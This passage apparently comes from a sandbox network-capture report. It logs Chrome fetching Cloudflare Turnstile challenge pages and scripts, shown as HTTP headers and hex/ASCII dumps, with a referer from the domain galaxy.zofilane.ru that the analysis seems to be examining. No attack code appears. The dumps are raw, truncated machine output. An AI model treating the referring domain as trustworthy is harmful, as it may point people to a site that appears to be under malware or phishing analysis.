                                                            2024-12-14 09:10:46 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                                            Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                                                            2024-12-14 09:10:46 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                                            Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                                            2024-12-14 09:10:46 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                            Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                                            2024-12-14 09:10:46 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                            Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.2.449774104.18.94.414436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:45 UTC798OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ncbj0/0x4AAAAAAA0Iaj6F5in3jjND/auto/fbE/normal/auto/ HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            sec-ch-ua-platform: "Windows"
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: navigate
                                                            Sec-Fetch-Dest: iframe
                                                            Referer: https://galaxy.zofilane.ru/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:46 UTC1362INHTTP/1.1 200 OK
                                                            Date: Sat, 14 Dec 2024 09:10:45 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 26677
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                            content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                            cross-origin-embedder-policy: require-corp
                                                            cross-origin-opener-policy: same-origin
                                                            cross-origin-resource-policy: cross-origin
                                                            origin-agent-cluster: ?1
                                                            accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                            critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                            referrer-policy: same-origin
                                                            document-policy: js-profiling
                                                            2024-12-14 09:10:46 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 31 64 31 30 30 38 38 61 37 64 34 33 31 34 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                            Data Ascii: Server: cloudflareCF-RAY: 8f1d10088a7d4314-EWRalt-svc: h3=":443"; ma=86400
                                                            2024-12-14 09:10:46 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                            2024-12-14 09:10:46 UTC1369INData Raw: 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64
                                                            Data Ascii: ding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiased
                                                            2024-12-14 09:10:46 UTC1369INData Raw: 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23 30
                                                            Data Ascii: troke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#0
                                                            2024-12-14 09:10:46 UTC1369INData Raw: 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b
                                                            Data Ascii: -dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark
                                                            2024-12-14 09:10:46 UTC1369INData Raw: 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65
                                                            Data Ascii: 0}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-he
                                                            2024-12-14 09:10:46 UTC1369INData Raw: 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33
                                                            Data Ascii: stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de13
                                                            2024-12-14 09:10:46 UTC1369INData Raw: 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70
                                                            Data Ascii: y:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-comp
                                                            2024-12-14 09:10:46 UTC1369INData Raw: 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78
                                                            Data Ascii: {left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:flex
                                                            2024-12-14 09:10:46 UTC1369INData Raw: 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a
                                                            Data Ascii: lor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width:


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            19192.168.2.449776104.18.94.414436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:47 UTC727OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8f1d10088a7d4314&lang=auto HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ncbj0/0x4AAAAAAA0Iaj6F5in3jjND/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:47 UTC331INHTTP/1.1 200 OK
                                                            Date: Sat, 14 Dec 2024 09:10:47 GMT
                                                            Content-Type: application/javascript; charset=UTF-8
                                                            Content-Length: 120555
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Server: cloudflare
                                                            CF-RAY: 8f1d10147889428b-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-12-14 09:10:47 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 78 45 4a 58 34 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73
                                                            Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.xEJX4={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https
                                                            2024-12-14 09:10:47 UTC1369INData Raw: 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30 70 72 6f 70 65 72 6c 79 2e 25 33 43 62 72 25 32 46 25 33 45 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72
                                                            Data Ascii: rowser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-suppor
                                                            2024-12-14 09:10:48 UTC1369INData Raw: 66 55 2c 66 59 2c 66 5a 2c 67 30 2c 67 33 2c 67 34 2c 67 78 2c 67 45 2c 67 31 2c 67 32 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 38 36 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 35 35 38 29 29 2f 32 2b 70 61 72 73 65 49 6e 74 28 67 49 28 38 31 33 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 31 31 29 29 2f 34 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 36 38 29 29 2f 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 31 38 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 37 33 36 29 29 2f 37 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 34
                                                            Data Ascii: fU,fY,fZ,g0,g3,g4,gx,gE,g1,g2){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1686))/1+parseInt(gI(558))/2+parseInt(gI(813))/3+-parseInt(gI(1011))/4+parseInt(gI(1568))/5*(-parseInt(gI(818))/6)+-parseInt(gI(1736))/7+-parseInt(gI(4
